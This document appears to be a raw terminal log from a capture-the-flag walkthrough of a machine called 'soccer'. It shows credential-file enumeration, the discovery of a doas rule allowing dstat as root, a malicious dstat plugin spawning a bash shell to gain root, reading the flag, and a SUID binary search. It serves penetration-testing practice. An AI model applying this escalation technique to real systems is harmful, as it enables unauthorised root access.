/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py
/usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/twisted/cred/credentials.py
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-plymouth.path
/usr/lib/systemd/system/systemd-ask-password-plymouth.service
#)There are more creds/passwds files in the previous parent folder
/usr/share/doc/git/contrib/credential
/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c
/usr/share/doc/git/contrib/credential/libsecret/git-credential-libsecret.c
/usr/share/doc/git/contrib/credential/netrc/git-credential-netrc
/usr/share/doc/git/contrib/credential/netrc/t-git-credential-netrc.sh
/usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c
/usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c
/usr/share/man/man1/git-credential-cache--daemon.1.gz
/usr/share/man/man1/git-credential-cache.1.gz
/usr/share/man/man1/git-credential-store.1.gz
/usr/share/man/man1/git-credential.1.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/man/man7/gitcredentials.7.gz
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
╔══════════╣ Searching passwords inside logs (limit 70)
Binary file /var/log/journal/54adfd95645d49d9a102f16e9e98293b/user-1001.journal matches
[ 4.757765] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
[ 5.271285] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r'
player@soccer:~$
we try this doas
player@soccer:~$
player@soccer:~$
player@soccer:~$ find / -name "doas.conf"
find: ‘/run/udisks2’: Permission denied
find: ‘/run/user/1001/inaccessible’: Permission denied
find: ‘/run/sudo’: Permission denied
find: ‘/run/cryptsetup’: Permission denied
find: ‘/run/multipath’: Permission denied
find: ‘/run/lvm’: Permission denied
find: ‘/run/systemd/unit-root’: Permission denied
find: ‘/run/systemd/inaccessible’: Permission denied
find: ‘/run/lock/lvm’: Permission denied
find: ‘/run/initramfs’: Permission denied
/usr/local/etc/doas.conf
find: ‘/sys/kernel/tracing’: Permission denied
find: ‘/sys/kernel/debug’: Permission denied
find: ‘/sys/fs/pstore’: Permission denied
find: ‘/sys/fs/bpf’: Permission denied
find: ‘/var/spool/rsyslog’: Permission denied
find: ‘/var/spool/cron/atjobs’: Permission denied
find: ‘/var/spool/cron/atspool’: Permission denied
find: ‘/var/spool/cron/crontabs’: Permission denied
find: ‘/var/lib/update-notifier/package-data-downloads/partial’: Permission denied
find: ‘/var/lib/snapd/void’: Permission denied
find: ‘/var/lib/snapd/cookie’: Permission denied
find: ‘/var/lib/polkit-1’: Permission denied
find: ‘/var/lib/apt/lists/partial’: Permission denied
find: ‘/var/lib/php/sessions’: Permission denied
find: ‘/var/lib/mysql’: Permission denied
find: ‘/var/lib/private’: Permission denied
find: ‘/var/lib/AccountsService/users’: Permission denied
find: ‘/var/lib/nginx/proxy’: Permission denied
find: ‘/var/lib/nginx/scgi’: Permission denied
find: ‘/var/lib/nginx/fastcgi’: Permission denied
find: ‘/var/lib/nginx/uwsgi’: Permission denied
find: ‘/var/lib/nginx/body’: Permission denied
find: ‘/var/lib/mysql-files’: Permission denied
find: ‘/var/lib/udisks2’: Permission denied
find: ‘/var/lib/mysql-keyring’: Permission denied
find: ‘/var/cache/ldconfig’: Permission denied
find: ‘/var/cache/apt/archives/partial’: Permission denied
find: ‘/var/cache/pollinate’: Permission denied
find: ‘/var/cache/private’: Permission denied
find: ‘/var/cache/apparmor/f4764548.0’: Permission denied
find: ‘/var/cache/apparmor/26b63962.0’: Permission denied
find: ‘/var/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-ModemManager.service-2Jc3Qh’: Permission denied
find: ‘/var/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-systemd-resolved.service-AZNBGh’: Permission denied
find: ‘/var/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-systemd-logind.service-gQS10e’: Permission denied
find: ‘/var/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-fwupd.service-brjMyf’: Permission denied
find: ‘/var/log/mysql’: Permission denied
find: ‘/var/log/private’: Permission denied
find: ‘/var/log/audit’: Permission denied
find: ‘/var/snap/lxd/common/lxd’: Permission denied
find: ‘/etc/multipath’: Permission denied
find: ‘/etc/polkit-1/localauthority’: Permission denied
find: ‘/etc/audisp’: Permission denied
find: ‘/etc/sudoers.d’: Permission denied
find: ‘/etc/audit’: Permission denied
find: ‘/etc/ssl/private’: Permission denied
find: ‘/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-systemd-logind.service-pA8l0f’: Permission denied
find: ‘/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-fwupd.service-2klkjg’: Permission denied
find: ‘/tmp/vmware-root_667-3980363901’: Permission denied
find: ‘/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-systemd-resolved.service-ltRDmi’: Permission denied
find: ‘/tmp/snap-private-tmp’: Permission denied
find: ‘/tmp/systemd-private-d1225d64ed7d49f69e0556c0a759b3c3-ModemManager.service-IA1Phh’: Permission denied
find: ‘/proc/tty/driver’: Permission denied
find: ‘/lost+found’: Permission denied
find: ‘/root’: Permission denied
find: ‘/snap/core20/1695/etc/ssl/private’: Permission denied
find: ‘/snap/core20/1695/root’: Permission denied
find: ‘/snap/core20/1695/var/cache/ldconfig’: Permission denied
find: ‘/snap/core20/1695/var/cache/private’: Permission denied
find: ‘/snap/core20/1695/var/lib/private’: Permission denied
find: ‘/snap/core20/1695/var/lib/snapd/void’: Permission denied
player@soccer:~$ cat /usr/local/etc/doas.conf
permit nopass player as root cmd /usr/bin/dstat
player@soccer:~$ dstat -h
Usage: dstat [-afv] [options..] [delay [count]]
Versatile tool for generating system resource statistics)
Dstat options:
-c, --cpu enable cpu stats
-C 0,3,total include cpu0, cpu3 and total
-d, --disk enable disk stats
-D total,hda include hda and total
-g, --page enable page stats
-i, --int enable interrupt stats
-I 5,eth2 include int5 and interrupt used by eth2
-l, --load enable load stats
-m, --mem enable memory stats
-n, --net enable network stats
-N eth1,total include eth1 and total
-p, --proc enable process stats
-r, --io enable io stats (I/O requests completed)
-s, --swap enable swap stats
-S swap1,total include swap1 and total
-t, --time enable time/date output
-T, --epoch enable time counter (seconds since epoch)
-y, --sys enable system stats
--aio enable aio stats
--fs, --filesystem enable fs stats
--ipc enable ipc stats
--lock enable lock stats
--raw enable raw stats
--socket enable socket stats
--tcp enable tcp stats
--udp enable udp stats
--unix enable unix stats
--vm enable vm stats
--vm-adv enable advanced vm stats
--zones enable zoneinfo stats
--list list all available plugins
--<plugin-name> enable external plugin by name (see --list)
-a, --all equals -cdngy (default)
-f, --full automatically expand -C, -D, -I, -N and -S lists
-v, --vmstat equals -pmgdsc -D total
--bits force bits for values expressed in bytes
--float force float values on screen
--integer force integer values on screen
--bw, --black-on-white change colors for white background terminal
--color force colors
--nocolor disable colors
--noheaders disable repetitive headers
--noupdate disable intermediate updates
--output file write CSV output to file
--profile show profiling statistics when exiting dstat
delay is the delay in seconds between each update (default: 1)
count is the number of updates to display before exiting (default: unlimited)
player@soccer:~$ dstat 3 10
--total-cpu-usage-- -dsk/total- -net/total- ---paging-- ---system--
usr sys idl wai stl| read writ| recv send| in out | int csw
1 0 99 0 0| 234M 224M| 0 0 | 0 0 |6373k 12M
0 0 99 0 0| 0 0 | 178B 538B| 0 0 | 253 483
0 0 100 0 0| 0 0 | 103B 331B| 0 0 | 252 491 ^C
player@soccer:~$ cd /usr/local/share/dstat/
player@soccer:/usr/local/share/dstat$ ls
player@soccer:/usr/local/share/dstat$ echo "import os"
import os
player@soccer:/usr/local/share/dstat$
player@soccer:/usr/local/share/dstat$ os.system('bash -i')
-bash: syntax error near unexpected token `'bash -i''
player@soccer:/usr/local/share/dstat$
player@soccer:/usr/local/share/dstat$ vim dstat_pe.pyt
player@soccer:/usr/local/share/dstat$ vim dstat_pe.py
player@soccer:/usr/local/share/dstat$ doas /usr/bin/dstat pe
You did not select any stats, using -cdngy by default.
dstat: incorrect argument, try dstat -h for the correct syntax
player@soccer:/usr/local/share/dstat$ doas /usr/bin/dstat --pe
/usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
import imp
root@soccer:/usr/local/share/dstat#
root@soccer:/usr/local/share/dstat# id
uid=0(root) gid=0(root) groups=0(root)
root@soccer:/usr/local/share/dstat# pwd
/usr/local/share/dstat
root@soccer:/usr/local/share/dstat# cd /root
root@soccer:~# ls
app root.txt run.sql snap
root@soccer:~# cat root.txt
01fd0d3dafe0d3b083a6c69f84154f06
root@soccer:~# cat run.sql
delete from soccer_db.accounts where id != 1324;
root@soccer:~#
So we get the flag!
try suid
uid=33(www-data) gid=33(www-data) groups=33(www-data)
find / -user root -perm -4000 -print 2>/dev/null
/usr/local/bin/doas
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/snap/snapd/17883/usr/lib/snapd/snap-confine
/snap/core20/1695/usr/bin/chfn
/snap/core20/1695/usr/bin/chsh
/snap/core20/1695/usr/bin/gpasswd
/snap/core20/1695/usr/bin/mount
/snap/core20/1695/usr/bin/newgrp
/snap/core20/1695/usr/bin/passwd
/snap/core20/1695/usr/bin/su
/snap/core20/1695/usr/bin/sudo
/snap/core20/1695/usr/bin/umount
/snap/core20/1695/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1695/usr/lib/openssh/ssh-keysign
this is another try